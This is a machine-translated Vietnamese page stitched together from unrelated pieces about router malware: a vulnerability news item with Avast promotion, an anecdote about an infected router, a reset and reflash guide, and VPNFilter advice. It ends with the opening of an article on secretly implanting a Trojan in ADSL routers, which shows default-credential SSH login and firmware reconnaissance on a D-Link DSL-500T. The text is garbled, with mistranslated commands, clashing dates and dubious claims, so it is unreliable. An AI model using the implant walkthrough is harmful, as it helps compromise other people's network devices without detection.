Bộ định tuyến có thể nhiễm vi-rút không? Cách kiểm tra bộ định tuyến của bạn để tìm vi-rút và làm sạch nó: mẹo của chúng tôi. Ghi lại hình ảnh hệ thống tập tin

Bộ định tuyến của bạn là một trong những liên kết yếu nhất trong hệ thống bảo mật của bạn và các nhà nghiên cứu đã chứng minh điều đó một lần nữa.

60 lỗ hổng bảo mật đã được tìm thấy trong 22 mẫu bộ định tuyến trên khắp thế giới, hầu hết là do các nhà cung cấp dịch vụ Internet cung cấp. Những lỗ hổng này có thể cho phép tin tặc hack thiết bị, thay đổi mật khẩu cũng như cài đặt và thực thi các tập lệnh độc hại làm thay đổi máy chủ DNS. Bằng cách này, tin tặc có thể chuyển hướng bạn đến các trang web độc hại hoặc tải mã độc xuống máy tính của bạn khi bạn truy cập các trang web chính thức.

Các lỗ hổng cũng cho phép tin tặc đọc và ghi thông tin trên các thiết bị lưu trữ USB được kết nối với bộ định tuyến bị xâm nhập.

Nghiên cứu mô tả cách những kẻ tấn công có thể truy cập vào PC - cụ thể là thông qua một cửa sau với mật khẩu chung được nhân viên nhà cung cấp kỹ thuật sử dụng để hỗ trợ khách hàng từ xa qua điện thoại. Theo mặc định, quyền truy cập thứ hai với quyền quản trị viên này bị ẩn khỏi chủ sở hữu bộ định tuyến.

Những mẫu bộ định tuyến nào đã được thử nghiệm?

Các nhà nghiên cứu đã thử nghiệm các mẫu sau: Amper Xavi 7968, 7968+ và ASL-26555; Astoria ARV7510; Belkin F5D7632-4; cLinksys WRT54GL; Comtrend WAP-5813n, CT-5365, AR-5387un và 536+; D-Link DSL-2750B và DIR-600; Huawei HG553 và HG556a; ; Netgear CG3100D; Observa Telecom AW4062, RTA01N, Home Station BHS-RTA và VH4032N; Sagem LiveBox Pro 2 SP và Fast 1201 và Zyxel P 660HW-B1A.
Vì các nhà nghiên cứu đến từ Madrid nên mục tiêu nghiên cứu chính của họ là bộ định tuyến được cung cấp bởi các nhà cung cấp Internet Tây Ban Nha, nhưng Linksys, D-Link và Belkin được sử dụng rộng rãi ở Nga và các quốc gia khác.

Làm thế nào bạn có thể bảo vệ bộ định tuyến của bạn?

Tất cả các phần mềm chống vi-rút của Avast đều có tính năng Bảo mật mạng gia đình (HNS) tích hợp để quét các mạng Wi-Fi được cấu hình kém, chỉ ra mật khẩu Wi-Fi yếu hoặc mặc định, lỗ hổng trong bộ định tuyến, kết nối Internet bị tấn công và giao thức IPv6 được bật nhưng không được bảo vệ . Tính năng này cũng hiển thị danh sách các thiết bị được kết nối với mạng, điều này sẽ giúp bạn kiểm soát chỉ những thiết bị bạn biết mới được kết nối với mạng của mình. Avast là công ty bảo mật thông tin duy nhất cung cấp khả năng bảo vệ khu vực này.

Làm cách nào để quét bộ định tuyến gia đình của bạn bằng Home Network Security?

Mở giao diện người dùng Avast, nhấp vào nút Quét từ menu bên trái, sau đó chọn Quét mối đe dọa mạng.
Avast sẽ quét bộ định tuyến của bạn và cung cấp báo cáo về các mối đe dọa được tìm thấy. Trong hầu hết các trường hợp, nếu phát hiện thấy mối đe dọa cần bạn chú ý, Avast sẽ hướng bạn đến trang web của nhà sản xuất bộ định tuyến.

Gởi bạn đọc. Để tiết kiệm thời gian của bạn. Hãy nói thẳng vào vấn đề chính. TẤT CẢ những điều sau đây sẽ giúp ngăn chặn sự hiện diện của Trojan hoặc vi-rút trên máy tính trong 5-7 ngày. Trong khoảng thời gian này, các bản quét được gửi từ Internet, nhưng SAU vụ hack, có một sự im lặng đáng ngờ - không có bản quét nào - bộ định tuyến bị nhiễm không cho phép chúng vào PC nữa, nó chấp nhận lệnh và thực thi chúng. Điều này ảnh hưởng đến tốc độ Internet - nó giảm xuống.

Nếu bộ định tuyến của bạn đã bị nhiễm virus thì việc đánh cắp FTP, email và các mật khẩu khác sẽ xảy ra trong tương lai gần.

Đã vào năm 2009 ai đó DroneBL đã thông báo cho thế giới về đại dịch virus (bắt đầu?) lây nhiễm vào các bộ định tuyến. Tin tức của anh xuất hiện sau một cuộc tấn công vào trang web; các quản trị viên của trang này tiết lộ rằng đây về cơ bản là một loại hình tấn công Ddos mới. Cuộc tấn công được thực hiện bởi các bộ định tuyến bị nhiễm bệnh. Vì vậy, giờ đây, “gia đình” máy tính zombie đã có thêm một bổ sung mới - bộ định tuyến zombie. Một mạng botnet được phát hiện bao gồm các bộ định tuyến gia đình bị nhiễm virus! Họ gọi mạng này là “psyb0t”. Đây là cách đại dịch virus bộ định tuyến chính thức bắt đầu.

Việc hack xảy ra bằng cách quét các cổng của bộ định tuyến và chiếm quyền kiểm soát nó. Thật không may, có những bài viết trên Internet về việc mô hình bộ định tuyến này hoặc mô hình bộ định tuyến kia là dễ hack nhất. Nhưng ở đó bạn có thể tìm ra cách bảo vệ mình khỏi thảm họa này. Sau khi thiết lập quyền kiểm soát bộ định tuyến, việc theo dõi nội dung của lưu lượng truy cập bắt đầu được thực hiện. Trộm mật khẩu. Tham gia hoạt động độc hại chung của các mạng botnet trên Internet thế giới. Đang quét các cổng trên PC ở nhà của bạn, nhưng tôi sẽ đi vào chi tiết hơn ở đây. Tác giả đã có thể phát hiện ra rằng việc kết nối mạng với bộ định tuyến bị tấn công sẽ dẫn đến những vấn đề như vậy. Khi bạn cài đặt lại tường lửa, virus sẽ xuất hiện bất ngờ trong hệ thống. Khi cố gắng cài đặt Debian hoặc Ubuntu đồng thời tải xuống các bản cập nhật trong quá trình cài đặt, các hệ thống này đã không cài đặt chính xác. Cụ thể là

1. Không thể khởi chạy Firestarter đã cài đặt - chức năng quản trị được khởi chạy và thế là xong. tức là, một cái gì đó được khởi chạy với đặc quyền của quản trị viên nhưng không xác định được. Firestarter sẽ không bắt đầu.
2. Nếu có kết nối Internet, Deadbeef KHÔNG khởi động; khi bạn tắt bộ định tuyến, nó sẽ bật ngay lập tức.
3. Một số ứng dụng yêu cầu quyền quản trị viên được khởi chạy mà không yêu cầu mật khẩu, một số ứng dụng khác hoàn toàn không khởi động.
4. Kể từ khi viết bài viết này, những điểm này đã trở nên ít rõ ràng hơn. Nghĩa là, sẽ có vấn đề, nhưng chúng sẽ trông khác.

Cài đặt lại TRÊN CÙNG một máy tính, TỪ CÙNG đĩa cài đặt, với bộ định tuyến TẮT, đã thành công. Hệ thống (được thử nghiệm trên Ubuntu) hoạt động như kim đồng hồ. Điều này không có gì đáng ngạc nhiên vì các bộ định tuyến chạy hệ điều hành Linux Mipsel là thiết bị đầu tiên dễ bị tấn công. Tất nhiên, tác hại đến từ bộ định tuyến zombie “đa dạng” hơn những gì tôi nhận thấy và mô tả ở đây, nhưng những gì chúng tôi hiện đang giàu có, đó là những gì chúng tôi chia sẻ...

Windows đã cài đặt (với bộ định tuyến bị nhiễm bị vô hiệu hóa) “sống sót”, nhưng Agnitum Outpost Tường lửa Pro đã phát hiện việc quét cổng ngay từ những phút đầu tiên sau khi cài đặt. Những thứ kia. Bộ định tuyến đang tấn công (các) cổng.

Cơm. Quét các cổng của tôi từ Internet và cuối cùng là từ bộ định tuyến bị nhiễm virus.

Như bạn có thể thấy trong hình, vào ngày 27/04/2017 lúc 23:51:16 quá trình quét diễn ra từ bộ định tuyến zombie. Trước đó, đã có các bản quét từ Kaspersky Security Network - 130.117.190.207 (tường lửa không “thích” chúng, nhưng đây là tiêu chuẩn khi cài đặt Kaspersky) và không rõ ở đâu. Và vào ngày 27/04/12, cài đặt bộ định tuyến đã được đặt lại về cài đặt gốc (Huawei HG530). Kể từ đó, chúng chỉ bắt nguồn từ Kaspersky Security Network - 130.117.190.207 và ARP_UNWANTED_REPLY - tác giả đã kích hoạt tính năng lọc ARP. Do đó, bộ định tuyến cố gắng một lần nữa “nói chuyện” với PC (đây là hoạt động bình thường của bộ định tuyến - nhưng hiện tại Agnitum chỉ chuyển những phản hồi ARP đáp ứng yêu cầu từ PC của tôi), cũng như những nỗ lực của một số cá nhân để chặn lưu lượng truy cập bằng phản hồi ARP giả sẽ bị tường lửa chặn. Nếu ai đó chặn lưu lượng truy cập của tôi theo cách này và chuyển nó qua máy tính của họ, thì tôi sẽ đóng vai một nhân viên văn phòng sử dụng Internet, trong khi quản trị viên hệ thống của doanh nghiệp này nhìn thấy mọi hành động của tôi và lập báo cáo chi tiết cho sếp . Có bao nhiêu bức thư được viết (gửi cho ai, về cái gì), bao nhiêu cuộc trò chuyện trên ICQ. Tất nhiên, mật khẩu email, v.v. Họ cũng có thể ăn cắp nó.

Kết quả là kể từ thời điểm tôi đặt lại bộ định tuyến và thực hiện những gì tôi mô tả bên dưới, không có cuộc tấn công nào từ Internet. "Xạ thủ" đã bị loại bỏ, bộ định tuyến sạch sẽ và CHỈ thực hiện những gì nó được thiết kế. Nhưng Trojan trên PC cũng phải được loại bỏ, nếu không sẽ dẫn hacker đến IP của bạn.

Những người sản xuất thiết bị mạng không đưa ra các biện pháp bảo mật. Hướng dẫn dành cho bộ định tuyến có mô tả cách nhập thông tin đăng nhập và mật khẩu để truy cập nhà cung cấp, nhưng không có từ nào nói rằng không thể để lại mật khẩu quản trị viên mặc định trong bộ định tuyến! Ngoài ra, bộ định tuyến nhất thiết phải có các bộ phận điều khiển từ xa, thường được bật. Các nhà sản xuất phần mềm chống vi-rút im lặng. Câu hỏi chắc chắn được đặt ra: ai được lợi từ việc này?

Các con đường lây nhiễm.

Tốt hơn là nên xem nó một lần. Vì lý do này, tôi cung cấp ảnh động GIF kèm theo phân tích sơ đồ về tình huống. Nếu nó không hiển thị thì Adblock hoặc thứ gì đó tương tự đang can thiệp - hãy tắt nó trên trang này.

Có hai trong số họ. Đầu tiên là thông qua mạng WAN, hay còn gọi là Internet. Những thứ kia. Tin tặc tìm thấy IP của bạn, chẳng hạn như khi bạn tải xuống hoặc phân phối tệp bằng giao thức torrent (thông tin thêm về điều này ở cuối bài viết) và bằng cách quét IP của bạn, chúng tìm thấy các điểm yếu trong bảo mật của bộ định tuyến. Nhưng điều này ít phổ biến hơn. Làm thế nào để đóng các cổng này, chúng tôi đọc thêm trong bài viết này.

Hoặc có một Trojan trên PC của chúng tôi. Và vì vậy anh ta dẫn tin tặc đến IP động (!) Của chúng tôi. Biết địa chỉ này, họ đã hack bộ định tuyến một cách có phương pháp. Chúng tôi đọc về Trojan trong con đường lây nhiễm thứ hai.

Thứ hai là thông qua mạng LAN, tức là từ PC của bạn. Nếu có Trojan trên PC của bạn thì tin tặc sẽ có thể đoán mật khẩu của bộ định tuyến trực tiếp từ PC của bạn. Vì vậy, mật khẩu này đôi khi phải được thay đổi. Nhưng còn thực tế là một máy tính bị nhiễm sẽ cố gắng hack bộ định tuyến từ một phía không được bảo vệ thì sao? Trước tiên, bạn cần hiểu rằng một bộ định tuyến sạch với PC bị nhiễm virus sẽ không tồn tại được lâu. Lực lượng vũ phu thông thường (đoán mật khẩu) sẽ phá vỡ nó trong một tuần, hoặc thậm chí nhanh hơn. Vì vậy, nếu bạn phải vệ sinh bộ định tuyến của mình thường xuyên, đã đến lúc nghĩ đến việc làm sạch hoàn toàn vi-rút.

Và bây giờ là thời điểm. Virus/Trojan trên PC đến từ đâu? Tôi liệt kê những lý do chính và giải pháp trong ngoặc. Các tùy chọn là:

1 - Windows đã bị bẻ khóa ban đầu đã được cài đặt (sử dụng đĩa cài đặt trống);

2 - Windows sạch đã bị bẻ khóa sau khi cài đặt (có thể chịu đựng và cài đặt lại hàng tháng hoặc mua Windows);

3 - phần mềm bẻ khóa (sử dụng chương trình miễn phí hoặc mua chương trình trả phí);

4 - bạn có vi-rút trong các tệp cá nhân của mình (chạy tất cả các tệp cá nhân thông qua quá trình dọn dẹp, như tôi đã mô tả khi dọn dẹp hệ thống khỏi vi-rút);

5 - hệ thống đã bị nhiễm virus trong quá trình sử dụng qua ổ đĩa flash, Internet, ai biết làm thế nào (bảo vệ - chúng tôi nghiên cứu Internet một cách an toàn, về ổ đĩa flash, tôi sẽ giữ im lặng về điểm cuối cùng).

Riêng biệt, tôi lưu ý rằng sau khi phát hiện ra IP của bộ định tuyến, tin tặc bắt đầu quét nó để tìm quyền truy cập vào mật khẩu được mã hóa và sau đó chiếm quyền kiểm soát bằng cách sử dụng mật khẩu bị đánh cắp. Vì vậy, đừng để bộ định tuyến được bật nếu bạn không có nhu cầu truy cập Internet ngay bây giờ.

NHƯNG!!! Ngay cả khi bạn khởi động bằng máy ảo, chúng sẽ bắt đầu làm hỏng bộ định tuyến của bạn. Việc vô hiệu hóa và kích hoạt lại nó trong quá trình này sẽ giúp ích ở đây và ĐIỀU CHÍNH sau khi tải xong torrent là sau khi khởi động lại, nhà cung cấp sẽ cấp cho bộ định tuyến một IP động mới và tin tặc sẽ chỉ phải đoán địa chỉ của bạn hiện tại . Và bộ định tuyến của bạn cũng vậy... Tất nhiên, bạn sẽ không còn lại các bản phân phối - sau khi quá trình tải xuống hoàn tất, bạn nên tắt ngay chương trình tải xuống torrent và SAU đó, hãy tắt và bật bộ định tuyến.

Và nói chung

KHÔNG BẬT ROUTER TRỪ KHI BẠN CẦN! Đừng để những hacker nhỏ mọn truy cập lại vào tài sản của bạn... Đừng quên vệ sinh bộ định tuyến mỗi khi tốc độ kết nối Internet giảm xuống một cách vô lý. Cẩn thận sẽ không có hại...

Đó là nó. Bây giờ bạn có thể lấy hướng dẫn gốc cho bộ định tuyến của mình và chỉ định thông tin đăng nhập và mật khẩu do nhà cung cấp dịch vụ Internet của bạn cấp. Việc này thường được thực hiện trên tab cài đặt WAN. Bây giờ bạn sẽ không thể điều khiển bộ định tuyến của mình qua Internet. Ít nhất là bây giờ.

Khi phân phối Internet qua Wi-Fi thông qua bộ định tuyến, nhiều vấn đề khác nhau có thể xuất hiện. Ví dụ: tình trạng chậm lại và ping cao có thể xảy ra do thiết bị phân phối bị nhiễm vi-rút. Chúng ta hãy xem xét kỹ hơn cách tự làm sạch bộ định tuyến.

Triệu chứng

Thiết bị có thể bị nhiễm các loại virus sau:

• làm chậm tốc độ truyền dữ liệu. Ví dụ: vi-rút có thể làm gián đoạn cài đặt, tốc độ thấp, mất tín hiệu, v.v.;
• thay thế địa chỉ trang web. Nó xảy ra như thế này: một người truy cập một tài nguyên và phần mềm độc hại thay đổi DNS và người dùng được chuyển hướng đến một trang web có quảng cáo hoặc hiển thị với các khối quảng cáo do chủ sở hữu trang web đặt. Loại virus này cũng nguy hiểm vì nó có thể chuyển hướng đến một tài nguyên có chứa nội dung độc hại khác.

Trong mọi trường hợp, nếu bộ định tuyến không ổn định thì cần phải kiểm tra xem có vi-rút không, loại vi-rút này khá dễ loại bỏ.

Nhiễm trùng xảy ra như thế nào?

Bộ định tuyến phân phối Internet tới tất cả các thiết bị được kết nối với nó. Điều này có nghĩa là tất cả các thiết bị đều hoạt động trên cùng một mạng cục bộ. Virus lợi dụng điều này: nó xâm nhập vào máy tính thông qua một trang web hoặc một tệp đã tải xuống, sau đó qua mạng, nó xâm nhập vào bộ định tuyến, nơi nó thực hiện các hành động độc hại.

Mức độ nghiêm trọng của tình huống phụ thuộc vào phiên bản của chương trình vi-rút, ví dụ: một số loài gây hại hoạt động bí mật và bắt đầu hoạt động tích cực chỉ khi chúng ở trong bộ định tuyến, trong khi những loài khác, ngược lại, có thể đồng thời làm hỏng hệ điều hành.

Kiểm tra thiết bị mạng xem có bị lây nhiễm không

Trước khi làm sạch thiết bị của bạn khỏi vi-rút, bạn cần kiểm tra bộ định tuyến xem có sự hiện diện của chúng không. Để thực hiện việc này, bạn cần kết nối trực tiếp cáp Internet với cổng máy tính. Rút dây WLAN ra khỏi bộ định tuyến và kết nối nó với máy tính, sau đó thực hiện các thao tác sau:

• Khởi chạy trình duyệt của bạn và mở một số trang web. Đảm bảo nội dung của họ là chính xác và không có sự thay thế của các trang web hoặc khối quảng cáo. Vì mục đích xác minh, tốt hơn nên chọn các tài nguyên không thể có quảng cáo.
• Chạy chương trình chống vi-rút để quét máy tính của bạn. Điều này là cần thiết để xác định đường lây nhiễm - từ máy tính hoặc từ bộ định tuyến. Hãy nhớ rằng có thể có một số loại vi-rút và chúng có thể hiện diện cả trong hệ thống và thiết bị mạng.

Loại bỏ virus

Xem video về bộ định tuyến bị nhiễm vi-rút tại đây:

Để loại bỏ chương trình độc hại, bạn cần đặt lại cài đặt về cài đặt gốc. Nếu chương trình vi-rút đã gây hại cho phần sụn, nó sẽ cần phải được cài đặt lại.

Đặt lại cài đặt

Để làm sạch bộ định tuyến, bạn cần đặt lại cài đặt của nó:

• Tìm nút Reset ở mặt sau của thiết bị. Cô ấy thường nổi bật so với những người khác. Nhấn và giữ nó cho đến khi bộ định tuyến đặt lại cài đặt và khởi động lại. Hãy nhớ rằng khi bạn khởi động lại, tất cả cài đặt sẽ bị mất và bộ định tuyến sẽ cần được cấu hình lại.

• Để định cấu hình bộ định tuyến, bạn cần kết nối nó với máy tính bằng cáp, sau đó khởi chạy trình duyệt và nhập địa chỉ 192.168.0.1. Nó có thể khác và được chỉ định trên chính bộ định tuyến hoặc trong tài liệu hoặc hướng dẫn của nó. Khi vào cài đặt thường nhập thông tin đăng nhập quản trị viên, mật khẩu giống nhau hoặc 12345. Nếu không đăng nhập được thì bạn nên xem hướng dẫn dành cho thiết bị mạng.

• Tìm tùy chọn Cài đặt nhanh. Chọn tất cả những gì áp dụng. Bạn cũng có thể thay đổi mật khẩu và tên mạng. Sau khi hoàn tất quá trình thiết lập, hãy lưu chúng và khởi động lại bộ định tuyến.

Sau khi hoàn thành tất cả các bước được mô tả, hãy kiểm tra xem bạn có giải quyết được sự cố hay không. Nếu cách này không hiệu quả, bạn sẽ cần phải flash lại thiết bị mạng.

Làm thế nào để thực hiện nhấp nháy?

Xảy ra trường hợp một chương trình vi-rút làm thay đổi phần sụn trên bộ định tuyến. Bạn có thể vô hiệu hóa phiên bản bị nhiễm bằng cách flash nó.

Kết nối máy tính của bạn với bộ định tuyến thông qua cáp LAN. Nó nên được bao gồm trong bất kỳ bộ định tuyến nào. Nếu nó không có ở đó thì bạn có thể sử dụng kết nối Wi-Fi. Tuy nhiên, phương pháp kết nối cáp sẽ được ưu tiên hơn.

Sau khi kết nối với bộ định tuyến, hãy khởi chạy trình duyệt và nhập giá trị 192.168.1.1 (hoặc giá trị khác được chỉ định trên chính thiết bị) vào trường địa chỉ, sau đó bạn sẽ cần nhập mật khẩu và đăng nhập để mở cài đặt bộ định tuyến. Tên đăng nhập và mật khẩu mặc định là quản trị viên. Nếu bạn không thể vào cài đặt, bạn cần tìm hiểu chi tiết đăng nhập hiện tại; có lẽ chúng đã bị thay đổi sau lần cài đặt cuối cùng.

Tải xuống phiên bản chương trình cơ sở mới từ trang web của nhà sản xuất và bằng cách đi tới cài đặt bộ định tuyến, chọn phiên bản đó trên đĩa máy tính. Quy trình phần sụn cho tất cả các bộ định tuyến là giống hệt nhau.

Bảo vệ thiết bị mạng khỏi virus

Để bảo vệ bộ định tuyến của bạn khỏi bị lây nhiễm, bạn có thể sử dụng các khuyến nghị sau:

• Cập nhật chương trình cơ sở lên phiên bản mới nhất. Truy cập trang web của nhà sản xuất, nhập mô hình của bạn vào tìm kiếm và tải xuống chương trình cơ sở mới nhất.
• Đặt giá trị mật khẩu nhiều chữ số cho giao diện web. Không phải tất cả các bộ định tuyến đều cho phép bạn thay đổi thông tin đăng nhập của mình. Tuy nhiên, nếu đặt mật khẩu phức tạp thì việc hack giao diện web sẽ không còn dễ dàng nữa.
• Đặt đăng nhập ngoại tuyến trong cài đặt bộ định tuyến.
• Thay đổi địa chỉ IP của bộ định tuyến trong truy cập cục bộ. Trong quá trình hack, virus sẽ liên hệ ngay với các địa chỉ như 192.168.0.1 và 192.168.1.1. Dựa trên điều này, tốt hơn là thay đổi octet thứ ba và thứ tư của địa chỉ IP mạng cục bộ.
• Cài đặt chương trình chống vi-rút đáng tin cậy trên PC của bạn. Nếu vi-rút cố gắng xâm nhập vào máy tính của bạn lần đầu tiên, vi-rút đó sẽ bị loại bỏ ngay lập tức, ngăn không cho vi-rút gây hại cho bộ định tuyến.
• Không lưu trữ mật khẩu trong trình duyệt của bạn.

Như bạn có thể thấy, việc kiểm tra bộ định tuyến của bạn để tìm vi-rút và làm sạch nó không khó. Nhưng tốt hơn hết bạn nên làm theo những lời khuyên đơn giản để ngăn ngừa nhiễm trùng. Nhưng nếu điều này xảy ra, bạn biết phải làm gì.

VPNFilter là một mối đe dọa ảnh hưởng đến nhiều loại bộ định tuyến và mô hình lưu trữ gắn mạng (NAS). VPNFilter có thể thu thập thông tin nhạy cảm và tương tác với lưu lượng mạng cũng như làm gián đoạn hoạt động của bộ định tuyến. Chương trình độc hại này có thể bình tĩnh sống sót sau khi khởi động lại bộ định tuyến.

Symantec cung cấp một công cụ trực tuyến miễn phí để nhanh chóng kiểm tra bộ định tuyến của bạn xem có bị nhiễm VPNFilter hay không.

Thông tin quan trọng

Công cụ trực tuyến kiểm tra xem thiết bị của bạn có bị xâm phạm bởi thành phần VPNFilter được gọi là plugin ssler hay không. Nếu bộ định tuyến của bạn không bị nhiễm plugin ssler, nó vẫn có thể bị xâm phạm bởi các mối đe dọa khác hoặc các thành phần VPNFilter.

Nếu lo ngại hoặc nghi ngờ rằng bộ định tuyến của mình bị nhiễm VPNFilter, bạn nên làm theo các khuyến nghị bên dưới.

Phải làm gì nếu bị nhiễm bệnh

Nếu bạn lo ngại rằng bộ định tuyến của mình bị nhiễm VPNFilter, chúng tôi khuyên bạn nên làm theo các bước sau:

1. Đặt lại bộ định tuyến của bạn để khôi phục cài đặt gốc. Trước tiên, hãy lưu cấu hình bộ định tuyến của bạn vì bạn sẽ cần phải cấu hình lại nó sau đó.
2. Tắt và khởi động lại bộ định tuyến của bạn. Xin lưu ý rằng chỉ cần khởi động lại bộ định tuyến của bạn mà không thực hiện khôi phục cài đặt gốc trước sẽ không xóa VPNFilter.
3. Thay đổi mật khẩu quản trị viên cho bộ định tuyến của bạn thành mật khẩu an toàn hơn. Nếu có thể, hãy ngắt kết nối bộ định tuyến của bạn khỏi Internet trong khi thực hiện bước này.
4. Cài đặt các bản cập nhật và chương trình cơ sở mới nhất cho bộ định tuyến của bạn.

Xin chào độc giả của tôi! Trong bài viết này tôi sẽ nói về các bộ định tuyến ADSL tuyệt vời
– những mảnh sắt không thể thiếu trong mạng lưới gia đình và công nghiệp. Tôi sẽ kể cho bạn nghe về câu hỏi
khai thác các tuyến này vì mục đích có lợi cho chúng ta - khâu vá một cách tàn bạo
Trojan bên trong bộ định tuyến. Và theo cách mà không ai có thể nhận ra
một quản trị viên thông minh, không phải một người dùng thông minh.

Mong muốn hoặc yêu cầu IQ

Khi tôi viết bài này, tôi cho rằng chỉ cần đọc là đủ
người dùng nâng cao đã cài đặt GNU\Linux, người cũng có một số kỹ năng
làm việc và lập trình trong hệ điều hành này. Tuy nhiên, có vẻ như
có thể lặp lại các bước của tôi trên Windows (ví dụ: sử dụng Cygwin), nhưng
điều này sẽ không được mô tả. Để đạt được khoái cảm tối đa bạn cũng cần
kỹ năng hàn sắt (điều này là tùy chọn).

Và tất cả bắt đầu...

Bằng cách nào đó tôi đã bị phân tâm. Vì vậy, tất cả bắt đầu khi một ngày kia người này cúp máy
phần cứng, hay nói đúng hơn là nó đã cắt đứt kết nối Internet một cách nguy hiểm và không
Tôi muốn khôi phục nó. Đồng thời, cô ấy ở rất xa, có thể tiếp cận được
Tôi không đến đó để gặp cô ấy (tuy nhiên, bằng cách nào đó tôi đã nói dối - tôi quá lười để đứng dậy khỏi ghế sofa).
khởi động lại bộ định tuyến :)), giao diện Web không phản hồi, nhưng tôi nhớ rằng trên
Cái này phải có telnet hoặc ssh. Đăng nhập vào khu vực quản trị
chưa từng thử trước đây và đã liều lĩnh không thay đổi mật khẩu tài khoản của mình (như
Hóa ra sau đó rất vô ích, vì mặc định là “admin:admin”). Vì vậy tôi
đã thử SSH và nó đã hoạt động!

$ssh [email được bảo vệ]
$Mật khẩu:

Giống như một tia sét từ màu xanh! Hộp bận rộn! Tôi chưa bao giờ nghĩ đến việc dưới quyền của ai
Hóa ra bộ định tuyến này được điều khiển – GNU/Linux! Tôi cảm thấy kinh hoàng
Tôi tự hỏi mọi thứ ở đây diễn ra như thế nào, và về mặt tinh thần, nhờ sự lười biếng và cơ hội, tôi
đã đi vào nghiên cứu.

Thu thập thông tin

Vậy tôi đã bắt đầu từ đâu? Tất nhiên, từ danh sách các lệnh có sẵn:

#busybox
...
Các chức năng được xác định hiện tại:
[, tro, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, tên máy chủ, id, ifconfig, init, insmod, kill, ln, đăng nhập, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, khởi động lại, rm, rmmod, tuyến đường, sh, ngủ,
đồng bộ hóa, tar, kiểm tra, tftp, touch, true, tty, umount, wget, whoami, vâng

Bộ sản phẩm khá hợp lý, đủ dùng cho việc nghiên cứu và triển khai ý tưởng thông thường.
Tiếp theo, sự quan tâm đến phiên bản kernel được đánh thức:

# cat /proc/phiên bản
Phiên bản Linux 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc phiên bản 2.95.3
20010315 (phát hành/MontaVista)) #1 Thứ Năm ngày 28 tháng 12 05:45:00 CST 2006

Để tham khảo: MontaVista là một bản phân phối nhằm mục đích nhúng
hệ thống. Phần lớn các nhà sản xuất thiết bị mạng cung cấp
ưu tiên cho hệ thống này. Nó cũng có thể được tìm thấy trên các thiết bị khác, ví dụ như trong
sách điện tử hoặc điện thoại di động.

# cat /etc/versions
KHÁCH HÀNG=DLinkRU
MÔ HÌNH=DSL-500T
PHIÊN BẢN=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BAN=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
bộ xử lý
: 0
mô hình cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
hướng dẫn chờ: không
hẹn giờ micro giây: có
vectơ ngắt bổ sung: có
quan điểm phần cứng: có
Ngoại lệ VCED: không có sẵn
Ngoại lệ VCEI: không có sẵn

AR7 là chip lõi kép được phát triển bởi Texas Instruments. Anh ta
chứa bộ định tuyến ADSL chính thức trên một chip duy nhất hỗ trợ các tiêu chuẩn ADSL1,
ADSL2,ADSL2+. Dựa trên bộ xử lý RISC hiệu suất cao MIPS 4KEc, với
tần số xung nhịp 175 hoặc 233 (tùy công nghệ sản xuất: 18 micron
hoặc 13µm). Con chip này chứa 2 giao diện UART trên bo mạch, một trong số đó (UART_A)
được sử dụng để xuất thông tin gỡ lỗi, cũng như giao diện EJTAG phục vụ
để gỡ lỗi (chương trình cơ sở) Bộ nhớ Flash. Việc sử dụng các giao diện này sẽ được thảo luận
được mô tả dưới đây.

Cuối cùng, tôi nhìn vào thông tin bộ nhớ:

# mèo /proc/mount
/dev/mtdblock/0/squashfs ro 0 0
không có /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# con mèo /proc/mtd
dev: kích thước xóa tên
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Đương nhiên, không quên địa chỉ khối:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

Từ phần trên, bộ nhớ Flash (/dev/mtdblock) có 5 khối:

mtd0– hình ảnh của hệ thống tập tin SquashFs. Đây là một tập tin đặc biệt
một hệ thống được nén và chỉ đọc. Vì
thuật toán nén gzip được sử dụng, nhưng trong trường hợp này - LZMA (tỷ lệ nén
cao hơn). Kích thước của khối này là 4 MB.

mtd1– khối này chứa lõi MontaVista được nén bằng thuật toán LZMA
điều kiện, kích thước khối 600 KB.

mtd2– Bootloader ADAM2, nạp kernel, cũng có
dịch vụ máy chủ FTP để phục hồi và flash. Sẽ có nhiều chi tiết hơn về nó
đã nêu thêm. Kích thước khối là 64 KB.

mtd3– phân chia giữa dữ liệu cấu hình và môi trường
(biến môi trường), bạn có thể xem trong /proc/ticfg/env.
Dữ liệu cấu hình nằm trong /etc/config.xml. Trung gian giữa các tập tin
hệ thống, khối cấu hình được đóng lại (giống như tất cả cm_*, control, o
chúng sau) chương trình cm_logic. Kích thước của khối này cũng là 64 KB.

mtd4– phần này chứa chữ ký phần sụn, hạt nhân và hình ảnh tệp
hệ thống. Khối này được sử dụng khi cập nhật chương trình cơ sở qua giao diện Web.
Ban đầu nó được lưu trữ trong khối này, sau đó tổng kiểm tra được kiểm tra
và nếu phù hợp, anh ấy sẽ đăng ký chỗ ở mới.

RAM (16 MB ở model này, nhưng ADAM2 ở model này
chỉ thấy 14 MB, được khắc phục bằng cách cập nhật), được gắn vào thư mục /var và
Bạn có thể dễ dàng sử dụng nó cho mục đích của chúng tôi:

# miễn phí
tổng số bộ đệm chia sẻ miễn phí đã sử dụng
Tôi: 14276 10452 3824 0

Chúng ta đừng quên xem qua danh sách các quy trình. Trong số những điều thú vị đang ẩn nấp ở đây
daemon: thttpd - Máy chủ web; dproxy - yêu cầu DNS lưu vào bộ nhớ đệm của máy chủ proxy; ddnsd
- Trình nền DNS; pppd... là daemon thực tế thực hiện kết nối thông qua giao thức
PPP và trong các thông số chúng ta thấy thông tin tài khoản. Vì vậy, nếu bộ định tuyến không
giả vờ là một cái ống (đọc - không phải ở chế độ cầu nối), thì bạn có thể
dễ dàng có được tài khoản.

Các chương trình cm_* đã bị đóng và mã nguồn đã bao gồm
được biên soạn (các chương trình này cũng được phát triển bởi Texas Instruments, trên D-Link
